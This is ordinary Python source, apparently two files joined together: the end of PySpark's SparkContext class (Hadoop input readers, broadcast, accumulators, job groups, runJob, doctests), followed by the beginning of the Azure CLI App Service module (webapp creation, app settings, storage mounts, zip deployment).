Read a 'new API' Hadoop InputFormat with arbitrary key and value class from HDFS,
a local file system (available on all nodes), or any Hadoop-supported file system URI.
The mechanism is the same as for sc.sequenceFile.
A Hadoop configuration can be passed in as a Python dict. This will be converted into a
Configuration in Java
:param path: path to Hadoop file
:param inputFormatClass: fully qualified classname of Hadoop InputFormat
(e.g. "org.apache.hadoop.mapreduce.lib.input.TextInputFormat")
:param keyClass: fully qualified classname of key Writable class
(e.g. "org.apache.hadoop.io.Text")
:param valueClass: fully qualified classname of value Writable class
(e.g. "org.apache.hadoop.io.LongWritable")
:param keyConverter: (None by default)
:param valueConverter: (None by default)
:param conf: Hadoop configuration, passed in as a dict
(None by default)
:param batchSize: The number of Python objects represented as a single
Java object. (default 0, choose batchSize automatically)
"""
jconf = self._dictToJavaMap(conf)
jrdd = self._jvm.PythonRDD.newAPIHadoopFile(self._jsc, path, inputFormatClass, keyClass,
valueClass, keyConverter, valueConverter,
jconf, batchSize)
return RDD(jrdd, self)
def newAPIHadoopRDD(self, inputFormatClass, keyClass, valueClass, keyConverter=None,
valueConverter=None, conf=None, batchSize=0):
"""
Read a 'new API' Hadoop InputFormat with arbitrary key and value class, from an arbitrary
Hadoop configuration, which is passed in as a Python dict.
This will be converted into a Configuration in Java.
The mechanism is the same as for sc.sequenceFile.
:param inputFormatClass: fully qualified classname of Hadoop InputFormat
(e.g. "org.apache.hadoop.mapreduce.lib.input.TextInputFormat")
:param keyClass: fully qualified classname of key Writable class
(e.g. "org.apache.hadoop.io.Text")
:param valueClass: fully qualified classname of value Writable class
(e.g. "org.apache.hadoop.io.LongWritable")
:param keyConverter: (None by default)
:param valueConverter: (None by default)
:param conf: Hadoop configuration, passed in as a dict
(None by default)
:param batchSize: The number of Python objects represented as a single
Java object. (default 0, choose batchSize automatically)
"""
jconf = self._dictToJavaMap(conf)
jrdd = self._jvm.PythonRDD.newAPIHadoopRDD(self._jsc, inputFormatClass, keyClass,
valueClass, keyConverter, valueConverter,
jconf, batchSize)
return RDD(jrdd, self)
def hadoopFile(self, path, inputFormatClass, keyClass, valueClass, keyConverter=None,
valueConverter=None, conf=None, batchSize=0):
"""
Read an 'old' Hadoop InputFormat with arbitrary key and value class from HDFS,
a local file system (available on all nodes), or any Hadoop-supported file system URI.
The mechanism is the same as for sc.sequenceFile.
A Hadoop configuration can be passed in as a Python dict. This will be converted into a
Configuration in Java.
:param path: path to Hadoop file
:param inputFormatClass: fully qualified classname of Hadoop InputFormat
(e.g. "org.apache.hadoop.mapred.TextInputFormat")
:param keyClass: fully qualified classname of key Writable class
(e.g. "org.apache.hadoop.io.Text")
:param valueClass: fully qualified classname of value Writable class
(e.g. "org.apache.hadoop.io.LongWritable")
:param keyConverter: (None by default)
:param valueConverter: (None by default)
:param conf: Hadoop configuration, passed in as a dict
(None by default)
:param batchSize: The number of Python objects represented as a single
Java object. (default 0, choose batchSize automatically)
"""
jconf = self._dictToJavaMap(conf)
jrdd = self._jvm.PythonRDD.hadoopFile(self._jsc, path, inputFormatClass, keyClass,
valueClass, keyConverter, valueConverter,
jconf, batchSize)
return RDD(jrdd, self)
def hadoopRDD(self, inputFormatClass, keyClass, valueClass, keyConverter=None,
valueConverter=None, conf=None, batchSize=0):
"""
Read an 'old' Hadoop InputFormat with arbitrary key and value class, from an arbitrary
Hadoop configuration, which is passed in as a Python dict.
This will be converted into a Configuration in Java.
The mechanism is the same as for sc.sequenceFile.
:param inputFormatClass: fully qualified classname of Hadoop InputFormat
(e.g. "org.apache.hadoop.mapred.TextInputFormat")
:param keyClass: fully qualified classname of key Writable class
(e.g. "org.apache.hadoop.io.Text")
:param valueClass: fully qualified classname of value Writable class
(e.g. "org.apache.hadoop.io.LongWritable")
:param keyConverter: (None by default)
:param valueConverter: (None by default)
:param conf: Hadoop configuration, passed in as a dict
(None by default)
:param batchSize: The number of Python objects represented as a single
Java object. (default 0, choose batchSize automatically)
"""
jconf = self._dictToJavaMap(conf)
jrdd = self._jvm.PythonRDD.hadoopRDD(self._jsc, inputFormatClass, keyClass,
valueClass, keyConverter, valueConverter,
jconf, batchSize)
return RDD(jrdd, self)
def _checkpointFile(self, name, input_deserializer):
jrdd = self._jsc.checkpointFile(name)
return RDD(jrdd, self, input_deserializer)
@ignore_unicode_prefix
def union(self, rdds):
"""
Build the union of a list of RDDs.
This supports unions() of RDDs with different serialized formats,
although this forces them to be reserialized using the default
serializer:
>>> path = os.path.join(tempdir, "union-text.txt")
>>> with open(path, "w") as testFile:
... _ = testFile.write("Hello")
>>> textFile = sc.textFile(path)
>>> textFile.collect()
[u'Hello']
>>> parallelized = sc.parallelize(["World!"])
>>> sorted(sc.union([textFile, parallelized]).collect())
[u'Hello', 'World!']
"""
first_jrdd_deserializer = rdds[0]._jrdd_deserializer
if any(x._jrdd_deserializer != first_jrdd_deserializer for x in rdds):
rdds = [x._reserialize() for x in rdds]
first = rdds[0]._jrdd
rest = [x._jrdd for x in rdds[1:]]
return RDD(self._jsc.union(first, rest), self, rdds[0]._jrdd_deserializer)
def broadcast(self, value):
"""
Broadcast a read-only variable to the cluster, returning a
L{Broadcast<pyspark.broadcast.Broadcast>}
object for reading it in distributed functions. The variable will
be sent to each cluster only once.
"""
return Broadcast(self, value, self._pickled_broadcast_vars)
def accumulator(self, value, accum_param=None):
"""
Create an L{Accumulator} with the given initial value, using a given
L{AccumulatorParam} helper object to define how to add values of the
data type if provided. Default AccumulatorParams are used for integers
and floating-point numbers if you do not provide one. For other types,
a custom AccumulatorParam can be used.
"""
if accum_param is None:
if isinstance(value, int):
accum_param = accumulators.INT_ACCUMULATOR_PARAM
elif isinstance(value, float):
accum_param = accumulators.FLOAT_ACCUMULATOR_PARAM
elif isinstance(value, complex):
accum_param = accumulators.COMPLEX_ACCUMULATOR_PARAM
else:
raise TypeError("No default accumulator param for type %s" % type(value))
SparkContext._next_accum_id += 1
return Accumulator(SparkContext._next_accum_id - 1, value, accum_param)
def addFile(self, path, recursive=False):
"""
Add a file to be downloaded with this Spark job on every node.
The C{path} passed can be either a local file, a file in HDFS
(or other Hadoop-supported filesystems), or an HTTP, HTTPS or
FTP URI.
To access the file in Spark jobs, use
L{SparkFiles.get(fileName)<pyspark.files.SparkFiles.get>} with the
filename to find its download location.
A directory can be given if the recursive option is set to True.
Currently directories are only supported for Hadoop-supported filesystems.
.. note:: A path can be added only once. Subsequent additions of the same path are ignored.
>>> from pyspark import SparkFiles
>>> path = os.path.join(tempdir, "test.txt")
>>> with open(path, "w") as testFile:
... _ = testFile.write("100")
>>> sc.addFile(path)
>>> def func(iterator):
... with open(SparkFiles.get("test.txt")) as testFile:
... fileVal = int(testFile.readline())
... return [x * fileVal for x in iterator]
>>> sc.parallelize([1, 2, 3, 4]).mapPartitions(func).collect()
[100, 200, 300, 400]
"""
self._jsc.sc().addFile(path, recursive)
def addPyFile(self, path):
"""
Add a .py or .zip dependency for all tasks to be executed on this
SparkContext in the future. The C{path} passed can be either a local
file, a file in HDFS (or other Hadoop-supported filesystems), or an
HTTP, HTTPS or FTP URI.
.. note:: A path can be added only once. Subsequent additions of the same path are ignored.
"""
self.addFile(path)
(dirname, filename) = os.path.split(path) # dirname may be directory or HDFS/S3 prefix
if filename[-4:].lower() in self.PACKAGE_EXTENSIONS:
self._python_includes.append(filename)
# for tests in local mode
sys.path.insert(1, os.path.join(SparkFiles.getRootDirectory(), filename))
if sys.version > '3':
import importlib
importlib.invalidate_caches()
def setCheckpointDir(self, dirName):
"""
Set the directory under which RDDs are going to be checkpointed. The
directory must be a HDFS path if running on a cluster.
"""
self._jsc.sc().setCheckpointDir(dirName)
def _getJavaStorageLevel(self, storageLevel):
"""
Returns a Java StorageLevel based on a pyspark.StorageLevel.
"""
if not isinstance(storageLevel, StorageLevel):
raise Exception("storageLevel must be of type pyspark.StorageLevel")
newStorageLevel = self._jvm.org.apache.spark.storage.StorageLevel
return newStorageLevel(storageLevel.useDisk,
storageLevel.useMemory,
storageLevel.useOffHeap,
storageLevel.deserialized,
storageLevel.replication)
def setJobGroup(self, groupId, description, interruptOnCancel=False):
"""
Assigns a group ID to all the jobs started by this thread until the group ID is set to a
different value or cleared.
Often, a unit of execution in an application consists of multiple Spark actions or jobs.
Application programmers can use this method to group all those jobs together and give a
group description. Once set, the Spark web UI will associate such jobs with this group.
The application can use L{SparkContext.cancelJobGroup} to cancel all
running jobs in this group.
>>> import threading
>>> from time import sleep
>>> result = "Not Set"
>>> lock = threading.Lock()
>>> def map_func(x):
... sleep(100)
... raise Exception("Task should have been cancelled")
>>> def start_job(x):
... global result
... try:
... sc.setJobGroup("job_to_cancel", "some description")
... result = sc.parallelize(range(x)).map(map_func).collect()
... except Exception as e:
... result = "Cancelled"
... lock.release()
>>> def stop_job():
... sleep(5)
... sc.cancelJobGroup("job_to_cancel")
>>> suppress = lock.acquire()
>>> suppress = threading.Thread(target=start_job, args=(10,)).start()
>>> suppress = threading.Thread(target=stop_job).start()
>>> suppress = lock.acquire()
>>> print(result)
Cancelled
If interruptOnCancel is set to true for the job group, then job cancellation will result
in Thread.interrupt() being called on the job's executor threads. This is useful to help
ensure that the tasks are actually stopped in a timely manner, but is off by default due
to HDFS-1208, where HDFS may respond to Thread.interrupt() by marking nodes as dead.
"""
self._jsc.setJobGroup(groupId, description, interruptOnCancel)
def setLocalProperty(self, key, value):
"""
Set a local property that affects jobs submitted from this thread, such as the
Spark fair scheduler pool.
"""
self._jsc.setLocalProperty(key, value)
def getLocalProperty(self, key):
"""
Get a local property set in this thread, or null if it is missing. See
L{setLocalProperty}
"""
return self._jsc.getLocalProperty(key)
def setJobDescription(self, value):
"""
Set a human readable description of the current job.
"""
self._jsc.setJobDescription(value)
def sparkUser(self):
"""
Get SPARK_USER for user who is running SparkContext.
"""
return self._jsc.sc().sparkUser()
def cancelJobGroup(self, groupId):
"""
Cancel active jobs for the specified group. See L{SparkContext.setJobGroup}
for more information.
"""
self._jsc.sc().cancelJobGroup(groupId)
def cancelAllJobs(self):
"""
Cancel all jobs that have been scheduled or are running.
"""
self._jsc.sc().cancelAllJobs()
def statusTracker(self):
"""
Return :class:`StatusTracker` object
"""
return StatusTracker(self._jsc.statusTracker())
def runJob(self, rdd, partitionFunc, partitions=None, allowLocal=False):
"""
Executes the given partitionFunc on the specified set of partitions,
returning the result as an array of elements.
If 'partitions' is not specified, this will run over all partitions.
>>> myRDD = sc.parallelize(range(6), 3)
>>> sc.runJob(myRDD, lambda part: [x * x for x in part])
[0, 1, 4, 9, 16, 25]
>>> myRDD = sc.parallelize(range(6), 3)
>>> sc.runJob(myRDD, lambda part: [x * x for x in part], [0, 2], True)
[0, 1, 16, 25]
"""
if partitions is None:
partitions = range(rdd._jrdd.partitions().size())
# Implementation note: This is implemented as a mapPartitions followed
# by runJob() in order to avoid having to pass a Python lambda into
# SparkContext#runJob.
mappedRDD = rdd.mapPartitions(partitionFunc)
sock_info = self._jvm.PythonRDD.runJob(self._jsc.sc(), mappedRDD._jrdd, partitions)
return list(_load_from_socket(sock_info, mappedRDD._jrdd_deserializer))
def show_profiles(self):
""" Print the profile stats to stdout """
if self.profiler_collector is not None:
self.profiler_collector.show_profiles()
else:
raise RuntimeError("'spark.python.profile' configuration must be set "
"to 'true' to enable Python profile.")
def dump_profiles(self, path):
""" Dump the profile stats into directory `path`
"""
if self.profiler_collector is not None:
self.profiler_collector.dump_profiles(path)
else:
raise RuntimeError("'spark.python.profile' configuration must be set "
"to 'true' to enable Python profile.")
def getConf(self):
conf = SparkConf()
conf.setAll(self._conf.getAll())
return conf
def _test():
import atexit
import doctest
import tempfile
globs = globals().copy()
globs['sc'] = SparkContext('local[4]', 'PythonTest')
globs['tempdir'] = tempfile.mkdtemp()
atexit.register(lambda: shutil.rmtree(globs['tempdir']))
(failure_count, test_count) = doctest.testmod(globs=globs, optionflags=doctest.ELLIPSIS)
globs['sc'].stop()
if failure_count:
sys.exit(-1)
if __name__ == "__main__":
_test()
|
custom.py
|
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
from __future__ import print_function
import threading
import time
import ast
try:
from urllib.parse import urlparse
except ImportError:
from urlparse import urlparse # pylint: disable=import-error
from binascii import hexlify
from os import urandom
import datetime
import json
import ssl
import sys
import uuid
from functools import reduce
from http import HTTPStatus
from six.moves.urllib.request import urlopen # pylint: disable=import-error, ungrouped-imports
import OpenSSL.crypto
from fabric import Connection
from knack.prompting import prompt_pass, NoTTYException
from knack.util import CLIError
from knack.log import get_logger
from msrestazure.azure_exceptions import CloudError
from msrestazure.tools import is_valid_resource_id, parse_resource_id
from azure.mgmt.storage import StorageManagementClient
from azure.mgmt.applicationinsights import ApplicationInsightsManagementClient
from azure.mgmt.relay.models import AccessRights
from azure.mgmt.web.models import KeyInfo, DefaultErrorResponseException
from azure.cli.command_modules.relay._client_factory import hycos_mgmt_client_factory, namespaces_mgmt_client_factory
from azure.cli.command_modules.network._client_factory import network_client_factory
from azure.cli.core.commands.client_factory import get_mgmt_service_client
from azure.cli.core.commands import LongRunningOperation
from azure.cli.core.util import in_cloud_console, shell_safe_json_parse, open_page_in_browser, get_json_object, \
ConfiguredDefaultSetter, sdk_no_wait, get_file_json
from azure.cli.core.util import get_az_user_agent
from azure.cli.core.profiles import ResourceType, get_sdk
from .tunnel import TunnelServer
from .vsts_cd_provider import VstsContinuousDeliveryProvider
from ._params import AUTH_TYPES, MULTI_CONTAINER_TYPES
from ._client_factory import web_client_factory, ex_handler_factory, providers_client_factory
from ._appservice_utils import _generic_site_operation
from .utils import _normalize_sku, get_sku_name, retryable_method
from ._create_util import (zip_contents_from_dir, get_runtime_version_details, create_resource_group, get_app_details,
should_create_new_rg, set_location, get_site_availability, get_profile_username,
get_plan_to_use, get_lang_from_content, get_rg_to_use, get_sku_to_use,
detect_os_form_src, get_current_stack_from_runtime)
from ._constants import (FUNCTIONS_STACKS_API_JSON_PATHS, FUNCTIONS_STACKS_API_KEYS,
FUNCTIONS_LINUX_RUNTIME_VERSION_REGEX, FUNCTIONS_WINDOWS_RUNTIME_VERSION_REGEX,
NODE_EXACT_VERSION_DEFAULT, RUNTIME_STACKS, FUNCTIONS_NO_V2_REGIONS)
logger = get_logger(__name__)
# pylint:disable=no-member,too-many-lines,too-many-locals
# region "Common routines shared with quick-start extensions."
# Please maintain compatibility in both interfaces and functionalities"
def create_webapp(cmd, resource_group_name, name, plan, runtime=None, startup_file=None, # pylint: disable=too-many-statements,too-many-branches
deployment_container_image_name=None, deployment_source_url=None, deployment_source_branch='master',
deployment_local_git=None, docker_registry_server_password=None, docker_registry_server_user=None,
multicontainer_config_type=None, multicontainer_config_file=None, tags=None,
using_webapp_up=False, language=None, assign_identities=None,
role='Contributor', scope=None):
SiteConfig, SkuDescription, Site, NameValuePair = cmd.get_models(
'SiteConfig', 'SkuDescription', 'Site', 'NameValuePair')
if deployment_source_url and deployment_local_git:
raise CLIError('usage error: --deployment-source-url <url> | --deployment-local-git')
docker_registry_server_url = parse_docker_image_name(deployment_container_image_name)
client = web_client_factory(cmd.cli_ctx)
if is_valid_resource_id(plan):
parse_result = parse_resource_id(plan)
plan_info = client.app_service_plans.get(parse_result['resource_group'], parse_result['name'])
else:
plan_info = client.app_service_plans.get(resource_group_name, plan)
if not plan_info:
raise CLIError("The plan '{}' doesn't exist in the resource group '{}".format(plan, resource_group_name))
is_linux = plan_info.reserved
node_default_version = NODE_EXACT_VERSION_DEFAULT
location = plan_info.location
# This is to keep the existing appsettings for a newly created webapp on existing webapp name.
name_validation = client.check_name_availability(name, 'Site')
if not name_validation.name_available:
if name_validation.reason == 'Invalid':
raise CLIError(name_validation.message)
logger.warning("Webapp '%s' already exists. The command will use the existing app's settings.", name)
app_details = get_app_details(cmd, name)
if app_details is None:
raise CLIError("Unable to retrieve details of the existing app '{}'. Please check that "
"the app is a part of the current subscription".format(name))
current_rg = app_details.resource_group
if resource_group_name is not None and (resource_group_name.lower() != current_rg.lower()):
raise CLIError("The webapp '{}' exists in resource group '{}' and does not "
"match the value entered '{}'. Please re-run command with the "
"correct parameters.". format(name, current_rg, resource_group_name))
existing_app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name,
name, 'list_application_settings')
settings = []
for k, v in existing_app_settings.properties.items():
settings.append(NameValuePair(name=k, value=v))
site_config = SiteConfig(app_settings=settings)
else:
site_config = SiteConfig(app_settings=[])
if isinstance(plan_info.sku, SkuDescription) and plan_info.sku.name.upper() not in ['F1', 'FREE', 'SHARED', 'D1',
'B1', 'B2', 'B3', 'BASIC']:
site_config.always_on = True
webapp_def = Site(location=location, site_config=site_config, server_farm_id=plan_info.id, tags=tags,
https_only=using_webapp_up)
helper = _StackRuntimeHelper(cmd, client, linux=is_linux)
if runtime:
runtime = helper.remove_delimiters(runtime)
current_stack = None
if is_linux:
if not validate_container_app_create_options(runtime, deployment_container_image_name,
multicontainer_config_type, multicontainer_config_file):
raise CLIError("usage error: --runtime | --deployment-container-image-name |"
" --multicontainer-config-type TYPE --multicontainer-config-file FILE")
if startup_file:
site_config.app_command_line = startup_file
if runtime:
site_config.linux_fx_version = runtime
match = helper.resolve(runtime)
if not match:
raise CLIError("Linux Runtime '{}' is not supported."
" Please invoke 'az webapp list-runtimes --linux' to cross check".format(runtime))
elif deployment_container_image_name:
site_config.linux_fx_version = _format_fx_version(deployment_container_image_name)
if name_validation.name_available:
site_config.app_settings.append(NameValuePair(name="WEBSITES_ENABLE_APP_SERVICE_STORAGE",
value="false"))
elif multicontainer_config_type and multicontainer_config_file:
encoded_config_file = _get_linux_multicontainer_encoded_config_from_file(multicontainer_config_file)
site_config.linux_fx_version = _format_fx_version(encoded_config_file, multicontainer_config_type)
elif plan_info.is_xenon: # windows container webapp
site_config.windows_fx_version = _format_fx_version(deployment_container_image_name)
# set the needed app settings for container image validation
if name_validation.name_available:
site_config.app_settings.append(NameValuePair(name="DOCKER_REGISTRY_SERVER_USERNAME",
value=docker_registry_server_user))
site_config.app_settings.append(NameValuePair(name="DOCKER_REGISTRY_SERVER_PASSWORD",
value=docker_registry_server_password))
site_config.app_settings.append(NameValuePair(name="DOCKER_REGISTRY_SERVER_URL",
value=docker_registry_server_url))
elif runtime: # windows webapp with runtime specified
if any([startup_file, deployment_container_image_name, multicontainer_config_file, multicontainer_config_type]):
raise CLIError("usage error: --startup-file or --deployment-container-image-name or "
"--multicontainer-config-type and --multicontainer-config-file is "
"only appliable on linux webapp")
match = helper.resolve(runtime)
if not match:
raise CLIError("Windows runtime '{}' is not supported. "
"Please invoke 'az webapp list-runtimes' to cross check".format(runtime))
match['setter'](cmd=cmd, stack=match, site_config=site_config)
# portal uses the current_stack propety in metadata to display stack for windows apps
current_stack = get_current_stack_from_runtime(runtime)
else: # windows webapp without runtime specified
if name_validation.name_available:
site_config.app_settings.append(NameValuePair(name="WEBSITE_NODE_DEFAULT_VERSION",
value=node_default_version))
if site_config.app_settings:
for setting in site_config.app_settings:
logger.info('Will set appsetting %s', setting)
if using_webapp_up: # when the routine is invoked as a help method for webapp up
if name_validation.name_available:
logger.info("will set appsetting for enabling build")
site_config.app_settings.append(NameValuePair(name="SCM_DO_BUILD_DURING_DEPLOYMENT", value=True))
if language is not None and language.lower() == 'dotnetcore':
if name_validation.name_available:
site_config.app_settings.append(NameValuePair(name='ANCM_ADDITIONAL_ERROR_PAGE_LINK',
value='https://{}.scm.azurewebsites.net/detectors'
.format(name)))
poller = client.web_apps.create_or_update(resource_group_name, name, webapp_def)
webapp = LongRunningOperation(cmd.cli_ctx)(poller)
if current_stack:
app_metadata = client.web_apps.list_metadata(resource_group_name, name)
app_metadata.properties["CURRENT_STACK"] = current_stack
client.web_apps.update_metadata(resource_group_name, name, kind="app", properties=app_metadata.properties)
# Ensure SCC operations follow right after the 'create', no precedent appsetting update commands
_set_remote_or_local_git(cmd, webapp, resource_group_name, name, deployment_source_url,
deployment_source_branch, deployment_local_git)
_fill_ftp_publishing_url(cmd, webapp, resource_group_name, name)
if deployment_container_image_name:
update_container_settings(cmd, resource_group_name, name, docker_registry_server_url,
deployment_container_image_name, docker_registry_server_user,
docker_registry_server_password=docker_registry_server_password)
if assign_identities is not None:
identity = assign_identity(cmd, resource_group_name, name, assign_identities,
role, None, scope)
webapp.identity = identity
return webapp
def validate_container_app_create_options(runtime=None, deployment_container_image_name=None,
multicontainer_config_type=None, multicontainer_config_file=None):
if bool(multicontainer_config_type) != bool(multicontainer_config_file):
return False
opts = [runtime, deployment_container_image_name, multicontainer_config_type]
return len([x for x in opts if x]) == 1 # you can only specify one out the combinations
def parse_docker_image_name(deployment_container_image_name):
if not deployment_container_image_name:
return None
slash_ix = deployment_container_image_name.rfind('/')
docker_registry_server_url = deployment_container_image_name[0:slash_ix]
if slash_ix == -1 or ("." not in docker_registry_server_url and ":" not in docker_registry_server_url):
return None
return docker_registry_server_url
def update_app_settings(cmd, resource_group_name, name, settings=None, slot=None, slot_settings=None):
if not settings and not slot_settings:
raise CLIError('Usage Error: --settings |--slot-settings')
settings = settings or []
slot_settings = slot_settings or []
app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_application_settings', slot)
result, slot_result = {}, {}
# pylint: disable=too-many-nested-blocks
for src, dest in [(settings, result), (slot_settings, slot_result)]:
for s in src:
try:
temp = shell_safe_json_parse(s)
if isinstance(temp, list): # a bit messy, but we'd like accept the output of the "list" command
for t in temp:
if t.get('slotSetting', True):
slot_result[t['name']] = t['value']
# Mark each setting as the slot setting
else:
result[t['name']] = t['value']
else:
dest.update(temp)
except CLIError:
setting_name, value = s.split('=', 1)
dest[setting_name] = value
result.update(slot_result)
for setting_name, value in result.items():
app_settings.properties[setting_name] = value
client = web_client_factory(cmd.cli_ctx)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_application_settings',
app_settings.properties, slot, client)
app_settings_slot_cfg_names = []
if slot_result:
new_slot_setting_names = slot_result.keys()
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
slot_cfg_names.app_setting_names = slot_cfg_names.app_setting_names or []
slot_cfg_names.app_setting_names += new_slot_setting_names
app_settings_slot_cfg_names = slot_cfg_names.app_setting_names
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return _build_app_settings_output(result.properties, app_settings_slot_cfg_names)
def add_azure_storage_account(cmd, resource_group_name, name, custom_id, storage_type, account_name,
share_name, access_key, mount_path=None, slot=None, slot_setting=False):
AzureStorageInfoValue = cmd.get_models('AzureStorageInfoValue')
azure_storage_accounts = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_azure_storage_accounts', slot)
if custom_id in azure_storage_accounts.properties:
raise CLIError("Site already configured with an Azure storage account with the id '{}'. "
"Use 'az webapp config storage-account update' to update an existing "
"Azure storage account configuration.".format(custom_id))
azure_storage_accounts.properties[custom_id] = AzureStorageInfoValue(type=storage_type, account_name=account_name,
share_name=share_name, access_key=access_key,
mount_path=mount_path)
client = web_client_factory(cmd.cli_ctx)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_azure_storage_accounts', azure_storage_accounts.properties,
slot, client)
if slot_setting:
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
slot_cfg_names.azure_storage_config_names = slot_cfg_names.azure_storage_config_names or []
if custom_id not in slot_cfg_names.azure_storage_config_names:
slot_cfg_names.azure_storage_config_names.append(custom_id)
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return result.properties
def update_azure_storage_account(cmd, resource_group_name, name, custom_id, storage_type=None, account_name=None,
share_name=None, access_key=None, mount_path=None, slot=None, slot_setting=False):
AzureStorageInfoValue = cmd.get_models('AzureStorageInfoValue')
azure_storage_accounts = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_azure_storage_accounts', slot)
existing_account_config = azure_storage_accounts.properties.pop(custom_id, None)
if not existing_account_config:
raise CLIError("No Azure storage account configuration found with the id '{}'. "
"Use 'az webapp config storage-account add' to add a new "
"Azure storage account configuration.".format(custom_id))
new_account_config = AzureStorageInfoValue(
type=storage_type or existing_account_config.type,
account_name=account_name or existing_account_config.account_name,
share_name=share_name or existing_account_config.share_name,
access_key=access_key or existing_account_config.access_key,
mount_path=mount_path or existing_account_config.mount_path
)
azure_storage_accounts.properties[custom_id] = new_account_config
client = web_client_factory(cmd.cli_ctx)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_azure_storage_accounts', azure_storage_accounts.properties,
slot, client)
if slot_setting:
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
slot_cfg_names.azure_storage_config_names = slot_cfg_names.azure_storage_config_names or []
if custom_id not in slot_cfg_names.azure_storage_config_names:
slot_cfg_names.azure_storage_config_names.append(custom_id)
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return result.properties
def enable_zip_deploy_functionapp(cmd, resource_group_name, name, src, build_remote=False, timeout=None, slot=None):
client = web_client_factory(cmd.cli_ctx)
app = client.web_apps.get(resource_group_name, name)
if app is None:
raise CLIError('The function app \'{}\' was not found in resource group \'{}\'. '
'Please make sure these values are correct.'.format(name, resource_group_name))
parse_plan_id = parse_resource_id(app.server_farm_id)
plan_info = None
retry_delay = 10 # seconds
# We need to retry getting the plan because sometimes if the plan is created as part of function app,
# it can take a couple of tries before it gets the plan
for _ in range(5):
plan_info = client.app_service_plans.get(parse_plan_id['resource_group'],
parse_plan_id['name'])
if plan_info is not None:
break
time.sleep(retry_delay)
if build_remote and not app.reserved:
raise CLIError('Remote build is only available on Linux function apps')
is_consumption = is_plan_consumption(cmd, plan_info)
if (not build_remote) and is_consumption and app.reserved:
return upload_zip_to_storage(cmd, resource_group_name, name, src, slot)
if build_remote:
add_remote_build_app_settings(cmd, resource_group_name, name, slot)
else:
remove_remote_build_app_settings(cmd, resource_group_name, name, slot)
return enable_zip_deploy(cmd, resource_group_name, name, src, timeout, slot)
def enable_zip_deploy_webapp(cmd, resource_group_name, name, src, timeout=None, slot=None):
return enable_zip_deploy(cmd, resource_group_name, name, src, timeout=timeout, slot=slot)
def enable_zip_deploy(cmd, resource_group_name, name, src, timeout=None, slot=None):
logger.warning("Getting scm site credentials for zip deployment")
user_name, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot)
try:
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
except ValueError:
raise CLIError('Failed to fetch scm url for function app')
zip_url = scm_url + '/api/zipdeploy?isAsync=true'
deployment_status_url = scm_url + '/api/deployments/latest'
import urllib3
authorization = urllib3.util.make_headers(basic_auth='{0}:{1}'.format(user_name, password))
headers = authorization
headers['Content-Type'] = 'application/octet-stream'
headers['Cache-Control'] = 'no-cache'
headers['User-Agent'] = get_az_user_agent()
import requests
import os
from azure.cli.core.util import should_disable_connection_verify
# Read file content
with open(os.path.realpath(os.path.expanduser(src)), 'rb') as fs:
zip_content = fs.read()
logger.warning("Starting zip deployment. This operation can take a while to complete ...")
res = requests.post(zip_url, data=zip_content, headers=headers, verify=not should_disable_connection_verify())
logger.warning("Deployment endpoint responded with status code %d", res.status_code)
# check if there's an ongoing process
if res.status_code == 409:
raise CLIError("There may be an ongoing deployment or your app setting has WEBSITE_RUN_FROM_PACKAGE. "
"Please track your deployment in {} and ensure the WEBSITE_RUN_FROM_PACKAGE app setting "
"is removed.".format(deployment_status_url))
# check the status of async deployment
response = _check_zip_deployment_status(cmd, resource_group_name, name, deployment_status_url,
authorization, timeout)
return response
def add_remote_build_app_settings(cmd, resource_group_name, name, slot):
settings = get_app_settings(cmd, resource_group_name, name, slot)
scm_do_build_during_deployment = None
website_run_from_package = None
enable_oryx_build = None
app_settings_should_not_have = []
app_settings_should_contain = {}
for keyval in settings:
value = keyval['value'].lower()
if keyval['name'] == 'SCM_DO_BUILD_DURING_DEPLOYMENT':
scm_do_build_during_deployment = value in ('true', '1')
if keyval['name'] == 'WEBSITE_RUN_FROM_PACKAGE':
website_run_from_package = value
if keyval['name'] == 'ENABLE_ORYX_BUILD':
enable_oryx_build = value
if scm_do_build_during_deployment is not True:
logger.warning("Setting SCM_DO_BUILD_DURING_DEPLOYMENT to true")
update_app_settings(cmd, resource_group_name, name, [
"SCM_DO_BUILD_DURING_DEPLOYMENT=true"
], slot)
app_settings_should_contain['SCM_DO_BUILD_DURING_DEPLOYMENT'] = 'true'
if website_run_from_package:
logger.warning("Removing WEBSITE_RUN_FROM_PACKAGE app setting")
delete_app_settings(cmd, resource_group_name, name, [
"WEBSITE_RUN_FROM_PACKAGE"
], slot)
app_settings_should_not_have.append('WEBSITE_RUN_FROM_PACKAGE')
if enable_oryx_build:
logger.warning("Removing ENABLE_ORYX_BUILD app setting")
delete_app_settings(cmd, resource_group_name, name, [
"ENABLE_ORYX_BUILD"
], slot)
app_settings_should_not_have.append('ENABLE_ORYX_BUILD')
# Wait for scm site to get the latest app settings
if app_settings_should_not_have or app_settings_should_contain:
logger.warning("Waiting SCM site to be updated with the latest app settings")
scm_is_up_to_date = False
retries = 10
while not scm_is_up_to_date and retries >= 0:
scm_is_up_to_date = validate_app_settings_in_scm(
cmd, resource_group_name, name, slot,
should_contain=app_settings_should_contain,
should_not_have=app_settings_should_not_have)
retries -= 1
time.sleep(5)
if retries < 0:
logger.warning("App settings may not be propagated to the SCM site.")
def remove_remote_build_app_settings(cmd, resource_group_name, name, slot):
settings = get_app_settings(cmd, resource_group_name, name, slot)
scm_do_build_during_deployment = None
app_settings_should_contain = {}
for keyval in settings:
value = keyval['value'].lower()
if keyval['name'] == 'SCM_DO_BUILD_DURING_DEPLOYMENT':
scm_do_build_during_deployment = value in ('true', '1')
